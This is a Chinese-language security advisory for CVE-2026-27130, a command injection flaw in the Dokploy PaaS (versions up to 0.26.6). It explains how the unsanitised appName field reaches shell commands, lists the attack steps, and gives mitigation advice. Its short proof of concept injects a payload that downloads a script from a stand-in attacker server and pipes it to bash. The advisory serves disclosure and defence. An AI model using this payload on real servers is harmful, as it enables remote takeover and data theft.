IPBUF安全漏洞报告
English
CVE-2026-27130 CVSS 9.9 严重

CVE-2026-27130 Dokploy远程命令执行漏洞

披露日期: 2026-05-18

漏洞信息

漏洞编号
CVE-2026-27130
漏洞类型
操作系统命令注入
CVSS评分
9.9 严重
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Dokploy

相关标签

RCE命令注入DokployCVE-2026-27130PaaS

漏洞概述

Dokploy是一款免费的自托管PaaS平台。在0.26.6及以下版本中,由于应用程序名称参数缺乏严格的输入清理和模式验证,导致存在操作系统命令注入漏洞。攻击者可通过在创建应用时注入恶意Shell元字符,利用服务器级权限执行任意命令,从而完全控制服务器。

技术细节

该漏洞源于Dokploy在处理用户输入的应用名称时存在安全缺陷。具体而言,`cleanAppName`函数仅替换空格并转换为小写,未能过滤Shell元字符(如`;`, `$()`, 反引号, `|`, `&`)。这些未经充分净化的用户输入被直接插值到通过`execAsync()`和`execAsyncRemote()`执行的Shell命令中。当已认证的攻击者在创建应用时将恶意载荷注入`appName`字段,并触发服务操作(如启动、停止、删除或扩容)时,这些恶意命令将以服务器级别的权限被执行。这允许攻击者在目标服务器上执行任意系统命令,可能导致敏感数据泄露、系统被破坏或完全沦陷。

攻击链分析

STEP 1
1. 获取访问权限
攻击者利用低权限账户登录Dokploy平台。
STEP 2
2. 注入恶意载荷
攻击者在创建新应用时,将包含Shell元字符(如分号或反引号)的恶意代码填入appName参数。
STEP 3
3. 触发漏洞
攻击者或系统触发针对该应用的服务操作(如启动、停止或扩容),调用后端的execAsync函数。
STEP 4
4. 执行命令
由于缺乏输入清洗,恶意应用名称被直接拼接到Shell命令中并在服务器端执行。
STEP 5
5. 获取控制权
攻击者成功在服务器上执行任意系统命令,获得服务器级别的控制权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// PoC for CVE-2026-27130 // Attacker injects a payload into the appName parameter during application creation. // The payload attempts to execute a reverse shell. const maliciousAppName = "testapp; $(curl http://attacker-server/shell.sh | bash) #"; // Hypothetical HTTP Request to create the application fetch('https://target-dokploy.com/api/application', { method: 'POST', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <ATTACKER_TOKEN>' }, body: JSON.stringify({ appName: maliciousAppName, // Vulnerable parameter // ... other necessary fields }) }); // Triggering the execution // When the admin or system triggers a service operation (e.g., start/stop), // the command executed by the server might look like: // docker-compose up -d "testapp; $(curl http://attacker-server/shell.sh | bash) #" // This results in the execution of the injected curl command.

影响范围

Dokploy <= 0.26.6

防御指南

临时缓解措施
建议立即检查系统版本并升级。若无法立即升级,应严格限制对Dokploy管理接口的网络访问,仅允许可信IP访问,并密切监控服务器进程日志,查找异常的Shell命令执行记录。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表